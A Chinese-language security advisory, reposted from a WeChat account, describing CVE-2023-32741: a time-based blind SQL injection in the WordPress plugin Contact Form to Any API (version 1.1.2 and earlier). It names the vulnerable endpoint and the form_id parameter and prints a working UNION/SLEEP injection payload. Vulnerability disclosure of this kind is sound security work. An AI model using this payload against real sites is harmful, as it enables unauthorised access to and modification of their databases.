CVE-2023-32741-[WordPress] 联系表单 - SQL 注入漏洞

admin 2024年8月26日22:59:23评论22 views字数 577阅读1分55秒阅读模式

软件链接:https://wordpress.org/plugins/contact-form-to-any-api/

# 版本:1.1.2

# 测试平台:Windows、Linux

CVE 编号:CVE-2023-32741

# 产品描述

Contact form 7 to Any API 是最强大的插件,可将 cf7 数据发送到任何第三方服务。它可用于将数据发送到 CRM 或任何 REST API。易于使用且用户友好的设置。它还使用搜索和将数据导出到 csv 或 excel 等高级功能将 Contact Form 7 表单提交的数据保存到数据库。

CVE-2023-32741-[WordPress] 联系表单 - SQL 注入漏洞

# 漏洞概述

Wordpress 插件 Contact Form to Any API <= 1.1.2 容易受到盲 SQL 注入 (基于时间) 攻击,该攻击通过 /wp-admin/edit.php 端点上的 form_id 参数进行。此漏洞可能导致未经授权的数据访问和修改。

概念证明

受影响的端点:/wp-admin/edit.php?post_type=cf7_to_any_api&page=cf7anyapi_entries&form_id=

受影响的参数:form_id

有效载荷:1 UNION SELECT NULL,NULL,NULL,NULL,NULL,SLEEP(5)---

原文始发于微信公众号(云梦安全):CVE-2023-32741-[WordPress] 联系表单 - SQL 注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月26日22:59:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-32741-[WordPress] 联系表单 - SQL 注入漏洞http://cn-sec.com/archives/3095944.html

发表评论

匿名网友 填写信息